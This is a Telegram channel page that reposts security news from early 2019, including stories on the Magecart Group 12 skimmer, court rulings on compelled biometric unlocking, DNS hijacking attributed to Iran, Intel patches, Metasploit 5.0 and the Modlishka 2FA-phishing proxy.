BlackBox (EN)


Гео и язык канала: не указан, не указан
Категория: не указана


Database For cRyPtHoN™ INFOSEC
(For Reading Only - No Need Subscribe)
https://t.me/cRyPtHoN_INFOSEC_EN

Связанные каналы

Гео и язык канала
не указан, не указан
Категория
не указана
Статистика
Фильтр публикаций


New Magecart Group Hits Hundreds of Sites Via Supply Chain

Researchers have uncovered a twelvth Magecart group using tried-and-tested methods to disseminate the digital skimming code by infecting the supply chain.

RiskIQ, which has for several years been tracking the activity of groups using Magecart to steal customer card details, claimed the new group has managed to infect hundreds of websites so far via a third party.

This firm is Adverline, a French advertising agency. The attackers are said to have compromised a content delivery network for ads run by the company to include a stager containing the skimmer code.

This means that any website loading script from the ad agency's ad tag would inadvertently load the digital skimmer for visitors.

“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” explained Magecart in a blog post.

“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”

RiskIQ warned that there’s the potential for thousands more businesses to be affected, given they all run the compromised ad tag.

This is the latest in a long line of Magecart activity which can be split roughly into two camps: attacks targeting firms’ websites directly, like the ones affecting BA and Newegg, and ones targeting suppliers.

Alongside this latest campaign, Magecart groups have been behind attacks on the developer Inbenta Technologies which led to Ticketmaster customers having their card data stolen.

Just this week it emerged that high street banks in the UK have been sending out new cards to potentially affected customers, months after the incident was first reported.

📡@cRyPtHoN_INFOSEC_EN


Therefore, the prevailing thinking has gone, forcing suspects to press their fingers to get into a phone doesn’t breach their Fifth Amendment rights against forced self-incrimination.

It’s similar to when police with a search warrant demand a key to a lockbox that contains incriminating evidence, the Supreme Court has suggested: turning over the key is just a physical act, not “testimony” about something we know.

Over the years, there have been numerous court cases where that line of thinking has supported forced biometrics unlocking as well as people’s rights not to be forced into giving up passcodes. Here are just a few of those:

▶️ In 2014, when an Emergency Medical Services captain was charged with trying to strangle his girlfriend, a judge declared that cops could force phone unlocking with your fingerprint, but not with your passcode. Law enforcement in that case were after footage possibly recorded on video equipment in the suspect’s bedroom that might have shown the fight.

▶️ In 2015, a Pennsylvania federal district court confirmed Fifth Amendment protection for passcodes in an insider trading case.

▶️ In 2016, a Los Angeles judge forced a woman to unlock her iPhone with her finger so that police could get at evidence in a case concerning her alleged gang member boyfriend.

▶️ In October 2018, we saw the first known case of a suspect being forced to unlock his iPhone with his face.

The reasoning hasn’t always been applied that way, though. In 2016, a Philadelphia court said that a suspected child abuser would stay locked up indefinitely until he decrypted the drive that investigators thought contained abuse imagery, Fifth Amendment or no Fifth Amendment.

Similarly, there’s no guarantee that other courts will choose to apply this recent no-forced-biometrics ruling. We’ll be sure to keep an eye on how the courts continue to adapt in this age of connected devices, but for now, the safest thing to do if you care about your data privacy is likely the same as always: use a passcode instead of biometrics. The privacy of that approach is supported by a good deal of court rulings.

📡@cRyPtHoN_INFOSEC_EN


Police can’t compel biometric phone unlocking, rules judge

A Northern California federal judge ruled last week that police can’t force suspects to unlock their phones with their fingers, eyes or face, even with a warrant, because it amounts to the same type of self-incrimination as being forced to hand over your passcode.

If other courts apply her decision, it could set an important precedent in Fifth Amendment interpretation and the debate between compelling suspects to use “what they are” (i.e., forced use of their bodies) vs. “what they know” (i.e., forcing suspects to unlock their brains to get at their passcodes).

As Forbes reports, Judge Kandis Westmore ruled that compelled testimony is compelled testimony, regardless of whether it’s a passcode uttered aloud or a forced finger swipe. In this day and age, multiple forms of authentication unlock treasure troves of personal data, she wrote.

If a person cannot be compelled to provide a passcode because it is a testimonial communication, a person cannot be compelled to provide one’s finger, thumb, iris, face, or other biometric feature to unlock that same device.

Judge Westmore wrote the decision in denial of a warrant to police who were investigating alleged extortion in Oakland, California. The suspects allegedly used Facebook Messenger to threaten a man with the release of an embarrassing video unless he coughed up money.

Police had two suspects, but they wanted the go-ahead to compel anybody located on the same premises to unlock their devices, be it with a finger/thumb, face or iris. Judge Westmore denied the request for a search warrant on Fourth and Fifth Amendment grounds.

She agreed that the officers had probable cause to search the suspects’ property, but not to unlock any and all devices or compel people to do so. That would be a fishing expedition, she said. The government can’t be permitted to search and seize people’s devices just because they happen to be present during a lawful search.

With regards to the Fifth Amendment, it protects against suspects being forced to be witnesses against themselves. In this particular case, Judge Westmore wrote, the issue is whether the use of a suspect’s biometrics to unlock their device(s) is considered “testimonial” under the Fifth Amendment.
Courts are trying to keep pace with technology

The challenge facing courts is that “technology is outpacing the law,” the judge wrote. She referred to a recent case in which the US Supreme Court told courts that they needed to adopt rules that “take account of more sophisticated systems that are already in use or in development.”

The case she referred to, Carpenter v. United States, had to do with a Radio Shack robbery and the privacy of the phone location data that got the robber convicted. In June 2018, the Supreme Court ruled it unlawful for law enforcement and federal agencies to access cellphone location records without a warrant.

The decision said that courts “have an obligation to safeguard constitutional rights and cannot permit those rights to be diminished merely due to the advancement of technology.”

In the past, using biometrics to unlock devices has been compared to compelled fingerprinting or DNA swabs. Judge Westmore wrote that it should more rightly be thought of as a shortcut for a passcode, given that they both secure a device owner’s content – “pragmatically rendering them functionally equivalent.”

Her decision could be significant for both digital privacy and the law around search and seizure of connected devices. However, there’s no guarantee that it won’t be challenged or overturned. As it is, that law has continued to evolve, and there’s been a patchwork of contradictory findings.
A little history of finger forcing

Ever since Apple introduced Touch ID, many privacy and legal experts have said that biometric information such as fingerprints are like our DNA samples or our voice imprints: they’re simply a part of us. They don’t reveal anything that we know, meaning that they don’t count as testimony against ourselves.


US lays charges for hacking SEC database for filing public company earnings

The US Securities and Exchange Commission (SEC) has charged hackers for illegally accessing the SEC’s EDGAR database to use in illegal trades after the same group had hacked press release services to make trades on non-public information.

The SEC today announced charges against nine people for hacking EDGAR to use information in illegal trades that took place in 2016.

The charges are against one Ukraine hacker, six traders from California, Ukraine, and Russia, and two companies.

The hacker and traders are alleged to have used EDGAR illegally in 2016 after hacking the press release services, PRNewswire Associates LLC and Business Wire, according to Bloomberg.

The accused allegedly gained access to the SEC’s computer networks through a “series of targeted cyber-attacks, including directory traversal attacks, phishing attacks, and infecting computers with malware”, according to the Justice Department.

EDGAR, or the Electronic Data Gathering, Analysis, and Retrieval system, contains millions of forms that companies submit before the information is made publicly available. People with access to these non-public information can win on trades before the information is made public.

The SEC alleges that Ukrainian hacker Oleksandr Ieremenko hacked the SEC database to gain access to non-public earnings results between May and October 2016 that earned him and others involved at least $4.1 million.

The Justice Department today announced that 26-year-old Ieremenko and fellow Ukrainian national Artem Radchenko, 27, faced fraud and computer crime charges for illegally accessing pre-release earning reports from the SEC.

The breaches highlight the difficulties the US has faced in preventing and punishing foreign hackers for attacking US financial markets.

“The defendants allegedly orchestrated sophisticated computer intrusions to steal non-public information from the SEC, compromising the integrity of the market and depriving honest investors of a level playing field,” said Assistant Attorney General Benczkowski.

“The Department of Justice will aggressively pursue and prosecute those who attack our financial markets and seek to profit unfairly, no matter where such offenders reside.”

After stealing information from EDGAR, the hackers sent the earnings reports to a server in Lithuania. People involved in the scheme used the information to make trades before the information was made public.

📡@cRyPtHoN_INFOSEC_EN


Police can’t force you to unlock your phone by iris, face or finger

A US judge has ruled that law enforcement cannot force you to release your biometric mobile device lock.

A US judge has ruled that law enforcement does not have the right to force individuals to unlock their mobile devices through either their face or finger, whether or not a warrant is in play.

According to a judge presiding over a case in the US District Court for the Northern District of California, forcing a person to do so violates Fifth Amendment rights against self-incrimination.

Protections are already in place to protect against self-incrimination when it comes to passcodes for smartphones and so the judge, Kandis Westmore, has decided that biometric security deserves the same consideration in law.

As described by Forbes, "all logins are equal" now, no matter whether the means to access a device is achieved by revealing a passcode or using a body part.

This runs counter to how US legal professionals have previously viewed biometrics, including irises, faces, or fingerprints. Body parts for unlocking purposes were previously open season for the police, who were given the right to force a device to be unlocked through these means.

The decision came into being after Westmore reviewed a case relating to Facebook extortion. A victim received a demand for payment over Facebook Messenger on pain of an embarrassing video of them being released, and law enforcement requested a warrant to raid a suspect's property.

As well as obtaining the search warrant, the officers involved planned to force open any mobile device on the premises which was protected through biometric technology, such as Face ID or Touch ID.

In the ruling, the judge says that the government request to do so runs afoul of the Fourth and Fifth Amendments and, therefore, had to be denied.

While there were sufficient grounds to request a search warrant, Westmore said the overall request was "overbroad" and while two suspects were identified, "the request is neither limited to a particular person nor a particular device."

"Furthermore, the government's request to search and seize all digital devices at the subject premises is similarly overbroad," the ruling continues. "The government cannot be permitted to search and seize a mobile phone or other device that is on a non-suspect's person simply because they are present during an otherwise lawful search."

The Fifth Amendment states that no person "shall be compelled in any criminal case to be a witness against himself," and so, arguably, biometrics and passcodes -- the latter of which were once considered "testimonial" -- should be considered the same as information found on mobile devices unlocked through these means could result in a criminal prosecution.

"There are there other ways that the government might access the content that do not trample on the Fifth Amendment," the judge added, citing the possibility of obtaining Facebook messenger data under the Stored Communications Act or through a warrant.

The judge says that "technology is outpacing the law," and this rings true worldwide. For now, at least, US citizens can enjoy a small victory for privacy. It does not mean, however, that the motion to treat biometrics in the same way as passcodes when it comes to forced device unlocking will not be challenged in future cases.

📡@cRyPtHoN_INFOSEC_EN


British Hacker-for-Hire Goes to Prison for Liberian Telecom, Deutsche Telekom Mirai Attack

The British professional hacker behind the 2016 Mirai attack on Lonestar, Liberia’s largest telecom company, was sentenced to two years and eight months in prison, announced the UK National Crime Agency. Daniel Kaye, also known as “BestBuy” and “Spiderman,” was arrested in 2017 in the UK on a European Arrest Warrant, and confessed in December 2018.

Kaye, a 30-year-old hacker-for-hire, launched a wave of DDoS attacks while living in Cyprus. The NCA found he was on a month-to-month contract with an official at Cellcom, a Lonestar competitor. He allegedly received $100,000 for his efforts.

The first series of attacks on Liberia’s Lonestar MTN began in October 2015 through rented botnet and stressor services. As of September 2016, he used a Mirai botnet he created by taking advantage of poor security configurations to corrupt Dahua security cameras. The final attack, in November 2016 at 500 Gbps, took down Liberia’s entire internet network nationwide, leaving the company to struggle for days with mitigation and recovery.

Following the attack, Lonestar lost customers, dealt with tens of millions of US dollars in losses and spent some 600,000 USD on attack prevention and mitigation.

The Mirai DDoS botnet attack also crippled DYN’s DNS and Deutsche Telekom. Kaye also pleaded guilty to the attack on Deutsche Telekom, after he was extradited to Germany, according to British authorities.

“Daniel Kaye was operating as a highly skilled and capable hacker-for-hire,” said Mike Hulett, Head of Operations at the NCCU. “His activities inflicted substantial damage on numerous businesses in countries around the world, demonstrating the borderless nature of cybercrime. The victims in this instance suffered losses of tens of millions of dollars and had to spend a large amount on mitigating action. Working in collaboration with international law enforcement partners played a key role in bringing Daniel Kaye to justice.”

📡@cRyPtHoN_INFOSEC_EN


Researchers Invited to Hack a Tesla at Pwn2Own 2019

Researchers can earn up to $300,000 and a car if they manage to hack a Tesla Model 3 at this year’s Pwn2Own competition, Trend Micro’s Zero Day Initiative (ZDI) announced on Monday.

Pwn2Own 2019, scheduled to take place on March 20-22 alongside the CanSecWest conference in Vancouver, Canada, introduces an automotive category for which a Tesla Model 3 will be brought on site.

White hat hackers can earn between $50,000 and $250,000 for demonstrating an exploit against a Tesla’s modem or tuner, Wi-Fi or Bluetooth components, infotainment system, gateway, autopilot, security system, and key fob (including the phone used as a key). Some of the targeted components are also eligible for a bonus of $50,000 or $100,000 for persistence and a CAN bus hack, respectively.

“Along with the prize money, the first-round winner in this category will win a Tesla Model 3 mid-range rear-wheel drive vehicle,” ZDI said.

In the virtualization category, Pwn2Own participants can target Oracle VirtualBox, VMware Workstation and ESXi, and Microsoft Hyper-V Client. The highest prize is for Hyper-V – up to $250,000 and a $30,000 bonus for a privilege escalation on the host.

In the web browsers category, hackers can earn tens and even hundreds of thousands of dollars for sandbox escapes, Windows kernel privilege escalations, and VM escapes. The targets are Chrome, Edge, Safari and Firefox.

The enterprise category includes Adobe Reader, Microsoft Office 365, and Microsoft Outlook. Finally, the server-side category’s only target is Windows RDP, for which hackers can earn $150,000.

“Most of our server side targets moved to our Targeted Incentive Program, so they no longer need to be included in Pwn2Own,” ZDI explained.

The prize pool for this year’s event exceeds $1 million, and that does not include the money offered for hacking a Tesla.

At last year’s Pwn2Own, participants only took home less than $300,000 of the $2 million prize pool.

📡@cRyPtHoN_INFOSEC_EN


Huawei founder says company would not share user secrets

SHENZHEN, China (AP) — The founder of Huawei, in a new effort to allay Western security concerns, said Tuesday that the Chinese tech giant would not comply with Chinese government requests to disclose confidential information about its foreign customers and their communication networks.

Ren Zhengfei spoke in a rare meeting with foreign reporters as Huawei Technologies Ltd. counters concerns that threaten to hamper its access to global markets. Telecom carriers are preparing to spend billions of dollars on next-generation technology.

Ren’s comments were the 74-year-old former military engineer’s first public response to foreign accusations his company is controlled by the ruling Communist Party or is required to facilitate Chinese spying.

The United States, Australia, Japan and some other governments have imposed curbs on using Huawei technology over such concerns.

Asked how the company would respond to an official demand for confidential details about its customers and their operations, Ren said, “We would definitely say no to such a request.”

Asked whether Huawei might go to court, Ren said it would be up to Chinese authorities to “file litigation” if the company rejected such a request.

Ren said neither he nor the company have ever received a government request for “improper information” about anyone.

Huawei, the biggest global supplier of network equipment used by phone and internet companies, says it is employee-owned. Ren said no government entity or any other investor who isn’t a current or former employee owns “one cent of Huawei shares.”

Ren said Huawei has no research cooperation with the ruling party’s military wing, the People’s Liberation Army. He said the company also has no dedicated unit for military sales and he knew of no purchases of civilian technology by the PLA.

Ren is the father of Huawei’s chief financial officer, Meng Wanzhou, who was arrested Dec. 1 in Canada on U.S. charges related to possible violations of trade sanctions on Iran.

Ren said he misses his daughter but couldn’t discuss her case while it was before a court. However, he said Huawei obeys the law, including trade sanctions, in every country where it operates.

📡@cRyPtHoN_INFOSEC_EN


Fraudsters increasingly turning to Fuze cards to evade police

Street thieves who specialize in cashing out stolen credit and debit cards are increasingly using Fuze cards to conduct fraud and theft, the U.S. Secret Service has warned in a memo to companies in the financial sector.

Fraud rings use Fuze cards to avoid suspicions that could arise by carrying dozens of cards when attempting to draw cash or conduct purchases. Fuze cards allow them to store information for up to 30 stolen cards. The thief can simply use the controls on the Fuze card to swap through the card numbers.

Brian Krebs, a cybersecurity expert and investigative reporter, received a copy of the memo, which said that, “The transaction may also appear as a declined transaction but the fraudster, with the push of a button, is changing the card numbers being used,” the memo notes.

“Fraud rings often will purchase data on thousands of credit and debit cards stolen from hacked point-of-sale devices or obtained via physical card skimmers,” Krebs explains. “The data can be encoded onto any card with a magnetic stripe, and then used to buy high-priced items at retail outlets — or to withdrawn [sic] funds from ATMs (if the fraudsters also have the cardholder’s PIN).”

The Secret Service memo underscores that, “while this smart card technology makes up a small portion of fraudulent credit cards currently, investigators should be aware of the potential for significant increases in fraud loss amounts with the emergence of this smart card technology.”

Fuze Card, the company behind the technology, plans to extend Fuze functionality to include transactions with virtual currencies, like Bitcoin. When that happens, fraudsters might further increase their reliance on Fuze to conduct illicit transactions.

Last year, two independent security researchers discovered a grave flaw in the Fuze Bluetooth-pairing functionality which allowed anyone with brief physical access to tamper with the data stored “securely” on the cards. The researchers disclosed the flaw to Fuze Cards responsibly, holding off a public announcement until the company patched the bugs – which it did, in a timely fashion.

📡@cRyPtHoN_INFOSEC_EN


"It's interesting that attackers in Iran are pointed to as a possible source of these attacks. Attackers in Iran were linked to somewhat similar attacks back in 2011 that involved compromising a certificate authority to issue their own certificates," he said. "US-CERT have provided some advice on how to respond to these attacks, with the primary recommendation being to ensure you have two-factor authentication enabled on your domain name setting panels."

📡@cRyPtHoN_INFOSEC_EN


Iran linked to new DNS manipulation attack

Security researchers discover DNS hijacking attacks are targeting telecoms firms and governments and are being linked back to attackers in Iran.

Hackers have targeted DNS servers, hijacking them to redirect traffic in a bid to access credentials to be used in future attacks.

According to a blog post by researchers at FireEye, a suspected group of hackers backed by Iran has targeted government, telecommunications and internet infrastructure organisations across the Middle East and North Africa, Europe and North America.

Researches said they believed an Iranian-based group is behind the attacks and the victims include governments whose confidential information would have relatively little financial value but would be of interest to the Iranian government.

They added that the attacks have been carried out in waves between January 2017 to January 2019 and have had "a high degree of success".

"While we do not currently link this activity to any tracked group, initial research suggests the actor or actors responsible have a nexus to Iran," said FireEye researchers Muks Hirani, Sarah Jones and Ben Read.

Instead of using spear-phishing attacks to gain credentials, the hackers modified DNS records of victim organisations to redirect traffic to their own infrastructure.

The attacks used three different methods to carry out the DNS hijacking attacks. The first involved the attacker logging into the DNS provider’s administration panel, using previously compromised credentials. The DNS A record is changed to intercept traffic.

The second form of attack uses a similar method to log into the admin panel, but this time the victim’s domain registrar account is accessed, and DNS NS records changed.

The third method sees hackers using a DNS redirector. This is an attacker operations box which responds to DNS requests. This box redirects victim traffic to attacker-maintained infrastructure.

In all cases, hackers use a Let’s Encrypt Certificate to fool users into thinking the connection is trustworthy.

Researchers said it was difficult to identify a single intrusion vector for each record change, and it is possible that the actor, or actors are using multiple techniques to gain an initial foothold into each of the targets.

"While the precise mechanism by which the DNS records were changed is unknown, we believe that at least some records were changed by compromising a victim’s domain registrar account," said researchers.

Researchers said that this type of attack is difficult to defend against, "because valuable information can be stolen, even if an attacker is never able to get direct access to your organisation’s network".

The firm recommended that organisations implement multi-factor authentication on domain’s administration portals, validate changes for DNS A and NS records and search for and revoke any malicious certificates related to their domain.

Marco Hogewoning, senior external relations officer at the RIPE NCC, told SC Media UK that the attack appears to combine many common vulnerabilities and the point of entry is quite simply poor password security.

"Using standard password security measures such as not repeating passwords will go a long way. The next point they exploit is people not actively monitoring their networks – using tools like RIPE Atlas could help monitor and raise red flags when things change unexpectedly. And finally, a lot of DNS attacks also rely on rerouting traffic. This is where routing security measures like Resource Public Key Infrastructure (RPKI) could go a long way in staving off such attacks," he said.

Chris Doman, security researcher at AlienVault, told SC that this is continuing activity that was earlier reported on by Cisco in November.

"The main intention behind these attacks seems to be able to bypass the encryption on traffic to certain websites, by issuing attacker-controlled security certificates," he said.


German antitrust watchdog to act against Facebook: report

(Reuters) - Germany's antitrust watchdog plans to order Facebook to stop gathering some user data, a newspaper reported on Sunday.

The Federal Cartel Office, which has been investigating Facebook since 2015, has already found that the social media giant abused its market dominance to gather data on people without their knowledge or consent.

The Bild am Sonntag newspaper said the watchdog will present the U.S. company with its ruling on what action it needs to take in the next few weeks.

A Facebook spokeswoman said the company disputes the watchdog's findings and will continue to defend this position.

The investigation is being closely watched amid mounting concerns over leaks of data on tens of millions of Facebook users, as well as the use of social media by foreign powers seeking to influence elections in the United States.

The German watchdog objects in particular to how Facebook acquires data on people from third-party apps - including its own WhatsApp and Instagram services as well as games and websites - and its tracking of people who are not members.

The paper said it is still not clear how strictly Facebook will have to comply with the German order, noting that the watchdog looks likely to set a deadline for compliance rather than insisting on immediate action.

(Reporting by Rene Wagner; Writing by Emma Thomasson; Editing by David Goodman)

📡@cRyPtHoN_INFOSEC_EN


An official at the Chinese Embassy in Warsaw said Chinese envoys had urged Polish Foreign Ministry officials to arrange a consular visit with Wang “as soon as possible.”

Orange Poland told the AP on Friday it was cooperating with Polish security services in the case and had “handed over belongings of one of our employees” in Tuesday’s search of its offices. Orange told the AP it did not know if the suspicions against its employee were related to his work at Orange or his previous jobs.

Huawei’s chief financial officer, Meng Wanzhou, was arrested Dec. 1 in Canada in connection with U.S. accusations that the company violated restrictions on sales of American technology to Iran.

The United States wants Meng extradited to face charges that she misled banks about the company’s business dealings in Iran. She is out on bail in Canada awaiting extradition proceedings.

On Dec. 10, China detained former Canadian diplomat Michael Kovrig and Canadian entrepreneur Michael Spavor on vague national security allegations in apparent retaliation for Meng’s arrest.

📡@cRyPtHoN_INFOSEC_EN


Huawei fires sales manager who Poland charged with spying

LONDON (AP) — The Chinese tech company Huawei on Saturday announced it has fired a sales director who was arrested in Poland and charged with spying for China, saying he has brought the firm’s reputation “into disrepute.”

The company said it has “decided to terminate the employment of Mr. Wang Weijing, who was arrested on suspicion of breaking Polish law.”

Polish authorities said Friday they have arrested Wang, a Chinese citizen and former diplomat, along with a Polish cybersecurity expert who had held several top government cybersecurity jobs and also worked at the telecom company Orange.

Huawei said Wang’s actions “have no relation to the company” and that he was fired because “the incident in question has brought Huawei into disrepute.”

The arrest rekindled tensions between China and the West over cybersecurity concerns surrounding Huawei. It’s the world’s biggest maker of telecommunications equipment but has been banned in the U.S. since 2012 over fears it’s a security risk.

Earlier this week, Polish security agents searched the Warsaw offices of Huawei and Orange, Poland’s leading communications provider, seizing documents and electronic data. The homes of both men, also in Warsaw, were also searched, according to Internal Security Agency spokesman Stanislaw Zaryn.

Huawei had ambitious plans in Europe to roll out next-generation “5G” mobile networks. But some European governments and telecom companies are following the U.S. lead in questioning whether using Huawei for vital infrastructure for mobile networks could leave them exposed to snooping by the Chinese government.

“One thing is clear: this is another nail in the coffin of Huawei’s European ambitions,” said Thorsten Benner, director of the Global Public Policy Institute, a think tank.

Poland is Huawei’s headquarters for Central and Eastern Europe and the Nordic region.

Maciej Wasik, deputy head of Poland’s Special Services agency, said the operation that resulted in the arrests had been underway for a long time. He said “both carried out espionage activities against Poland.”

Zaryn told The Associated Press that prosecutors have charged the two men with espionage, but agents are continuing to collect evidence and interview witnesses. Further indictments are expected, he said.

Polish state television TVP reported that the men have proclaimed their innocence, but Zaryn could not confirm that. If convicted, they could face up to 10 years in prison each.

TVP identified the arrested Chinese man as Weijing W., saying he was a sales director in Poland at Huawei. It said he also went by the Polish first name of Stanislaw and had previously worked at the Chinese consulate in Gdansk.

A LinkedIn profile for a man named Stanislaw Wang appears to match details described by Polish television.

Wang’s resume said he worked at China’s General Consulate in Gdansk from 2006-2011 and at Huawei Enterprise Poland since 2011, where he was first director of public affairs and since 2017 the “sales director of public sector.” The resume said he received a bachelor’s degree in 2004 from the Beijing University of Foreign Studies.

State TV identified the Polish man as Piotr D., and said he was a high-ranking employee at the Internal Security Agency, where he served as deputy director in the department of information security, until 2011.

The Polish state news agency, PAP, said the man had also held top cybersecurity positions at the Interior Ministry and the Office of Electronic Communications, a regulatory body. It said, while at the Internal Security Agency, he was involved in building a mobile communications system for top Polish officials, and he was fired in 2011 amid a corruption scandal.

Geopolitical tensions over Huawei have intensified since Canada arrested a top executive last month at the request of U.S. authorities. Last year Australia, New Zealand and Japan instituted their own bans against using Huawei.


Intel patches flaws that could lead to privilege escalation

Intel has been forced to release patches for five bugs in its systems, three of which enable escalation of privileges, allowing hackers access to infrastructure

Intel has been forced to release patches for five bugs in its systems, three of which enable escalation of privileges.

The three high-severity security vulnerabilities could result in privilege escalation. The first is found in Intel PROSet/Wireless WiFi Software, its wireless connection management tool. The flaw, CVE-2018-12177, gets a CVSS score of 7.8, according to an Intel security advisory.

"Improper directory permissions in the ZeroConfig service in Intel PROSet/Wireless WiFi Software before version 20.90.0.7 may allow an authorised user to potentially enable escalation of privilege via local access," said the advisory.

Intel has recommended that users update their systems to Intel PROSet/Wireless WiFi Software version 20.90.0.7 or later.

The second flaw (CVE-2018-18098) affects Intel SGX SDK and Intel SGX Platform Software. According to an advisory for this, "improper file verification in install routine for Intel(R) SGX SDK and Platform Software for Windows before 2.2.100 may allow an escalation of privilege via local access."

A patch has been issued for this, alongside a medium-severity (detailed below).

A third vulnerability affects Intel System Support Utility for Windows. In a security advisory, Intel said that "Insufficient path checking in Intel(R) System Support Utility for Windows before 2.5.0.15 may allow an authenticated user to potentially enable an escalation of privilege via local access."

This flaw has been fixed in Intel System Support Utility for Windows v.2.5.0.15 and later.

Of the medium severity flaws, the first one focused on the Intel SGX SDK and Intel SGX Platform Software (CVE-2018-12155). The vulnerability could result in information disclosure.

"Data leakage in cryptographic libraries for Intel(R) IPP before 2019 update 1 release may allow an unprivileged user to cause information disclosure via local access," said the advisory.

The second medium severity bug (CVE-2018-12166) affects Intel Optane SSD DC P4800X and may trigger denial-of-service.

"Insufficient write protection in firmware for Intel Optane SSD DC P4800X before version E2010435 may allow a privileged user to potentially enable a denial of service via local access," said the advisory.

As well as these flaws, Intel has released fixes for two more privilege escalation bugs having medium severity ratings. These include CVE-2018-3703 that affected Intel SSD Data Center Tool for Windows and CVE-2017-3718 that targeted the system firmware for Intel NUC.

"Improper directory permissions in the installer for the Intel SSD Data Center Tool for Windows before v3.0.17 may allow authenticated users to potentially enable an escalation of privilege via local access," said the advisory.

In November last year, security researchers discovered a side-channel vulnerability in Intel chips involving hyperthreading technology that would enable an attacker to break encryption. In October, researchers at Cisco Talos discovered flaws and vulnerabilities in the Intel Unified Shader compiler for the Intel Graphics Accelerator that could enable a hacker attacker with normal user privileges in the guest to make a virtual machine unresponsive.

📡@cRyPtHoN_INFOSEC_EN


Side-Channel Attack Targets Windows, Linux

A research team of experts from Graz University of Technology, Boston University, NetApp, CrowdStrike, and Intel has published findings on page cache attacks. Unlike Spectre and Meltdown, this attack is a first-of-its-type, hardware-agnostic, side-channel attack that can remotely target operating systems such as Windows and Linux and effectively exfiltrate data, bypassing security precautions.

In explaining the attack, authors wrote: “Our side-channel permits unprivileged monitoring of some memory accesses of other processes, with a spatial resolution of 4KB and a temporal resolution of 2 microseconds on Linux (restricted to 6.7 measurements per second) and 466 nanoseconds on Windows (restricted to 223 measurements per second); this is roughly the same order of magnitude as the current state-of-the-art cache attacks.”

After detailing background information on hardware caches, cache attacks, and software caches, the authors provide an attack threat model in which the researchers “assume that attacker and victim have access to the same operating system page cache. On Linux, we also assume that the attacker has read access to the target page, which may be any page of any attacker-accessible file on the system.”

In addition to mitigation strategies, the researchers also stated that they responsibly disclosed the vulnerability to Microsoft, and the company said it will roll out a fix.

"This attack class presents a significantly lower complexity barrier than previous hardware-based, side-channel attacks and can easily be put into practice by threat actors, both nation-state as well as cyber-gangs,” said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks.

“In particular, password recovery via unprivileged applications is a major worry, as it would be available to most unwanted software bundlers and other programs typically thought of as relatively harmless. There is not much that an end user can currently do to protect themselves against this type of attack except to not run any software from a shady source, even if it does not raise any antivirus flag," said Hahad.

📡@cRyPtHoN_INFOSEC_EN


Rapid7 Releases Metasploit 5.0

Rapid7 on Friday announced the release of Metasploit 5.0. The latest major version of the popular penetration testing framework introduces several new important features, improved performance, and its developers say it should be easier to use.

According to Rapid7, Metasploit 5.0 brings significant changes in terms of database and automation APIs, improving the way the platform interacts with data and other tools. Metasploit has been using the PostgreSQL database system, but the latest version also allows users to run the database as a RESTful service, enabling interaction with Metasploit consoles and external tools.

There is also a new JSON-RPC API that should make it easier to integrate the framework with new tools and languages. In addition, Metasploit’s own automation protocol is now complemented by a common web service framework for the database and automation APIs.

Another significant improvement in Metasploit 5.0 is related to evasion modules and libraries. Penetration testers can now generate their own evasion modules more easily using the C programming language.

The latest version also enables the execution of an exploit module against multiple targets at a time.

Other improvements include faster and more advanced search functionality for modules, a new metashell feature, and support for three new languages – Go, Python and Ruby – for external modules.

Metasploit 5.0 is currently available from its official GitHub project. Rapid7 says it’s in the process of informing third-party developers that Metasploit 5.0 is stable – Linux distributions such as Kali and ParrotSec are shipped with Metasploit.

“Metasploit 5.0 offers a new data service, introduces fresh evasion capabilities, supports multiple languages, and builds upon the Framework’s ever-growing repository of world-class offensive security content,” wrote Brent Cook, engineering manager for Metasploit at Rapid7. “We’re able to continue innovating and expanding in no small part thanks to the many open source users and developers who make it a priority to share their knowledge with the community. You have our gratitude.”

📡@cRyPtHoN_INFOSEC_EN


Duszynski himself recommends utilising hardware based 2FA tokens that use an authentication protocol such as U2F which is used by YubiKey for example.

If that's not possible, then Annabel Jamieson, an associate manager at Accenture Security, recommends that in order to mitigate Modlishka organisations should:

1️⃣ Utilise deep packet inspection with SSL interception by a trusted proxy your organisation controls to help detect the Modlishka server from Reverse-Proxying the connection.

2️⃣ Utilise DNS RPZs with a trusted authoritative DNS server to help to prevent the resolution of the fake Modlishka server domain in the first place.

3️⃣ Implement strict access controls on systems to mitigate the opportunity and capability of threat actors to successfully authenticate the systems despite having the correct credentials.

4️⃣ Raise awareness of new social engineering tricks used in phishing campaigns and providing users with threat intelligence that tracks these new techniques and tactics.

📡@cRyPtHoN_INFOSEC_EN


Creator of Modlishka 2FA-busting automated attack tool criticised for public release

A Polish security researcher has created an automated tool for cracking two-factor authentication systems in phishing attacks, a tool he has made publicly available.

Polish security researcher Piotr Duszynski has developed a new reverse proxy tool for penetration testers that can be used to carry out phishing exploits as part of a red team exercise.

So far so meh, but Duszynski has put his tool, called Modlishka, onto GitHub for anyone to download.

That sparks a little more interest. Throw in the fact that not only can Modlishka bypass many of the 2FA schemes in use today, but also automates the whole process, and we have to sit up and take note.

Modlishka, from the Polish 'modliszka' which means mantis, was written to make it as effective and simple as possible for penetration testers to breach the target internal network perimeter using the social engineering route.

In his 'how to use' Wiki Duszynski helpfully notes, "Before you start any email phishing campaign, you will need a credible domain name. Obviously, in order to minimise the risk of being easily spotted by the target user the chosen domain should be as similar to the original as possible."

There's also the small matter of getting the required wildcard SSL certificate before Modlishka can be used, but once again the instructions are there to use LetsEncrypt with acme.sh script to automate the process.

Automation is at the heart of Modlishka and it is this – along with the man-in-the-middle nature of the proxy which enables the real-time collection of 2FA token – that makes Modlishka such a powerful hacking tool.

The author of Modlishka does issue a disclaimer on GitHub: "This tool is made only for educational purposes and can be only used in legitimate penetration tests. Author does not take any responsibility for any actions taken by its users."

However, releasing it into the public domain like this raises questions about the validity of that decision. Perhaps the most obvious being whether the benefit to penetration testers outweighs the risk of wannabe black hats having access to such a powerful point and click hacking tool? Duszynski says that "without a working proof of concept... the risk is treated as theoretical" and therefore "no real measures are taken to address it properly."

SC Media UK has been asking the industry for its opinion.

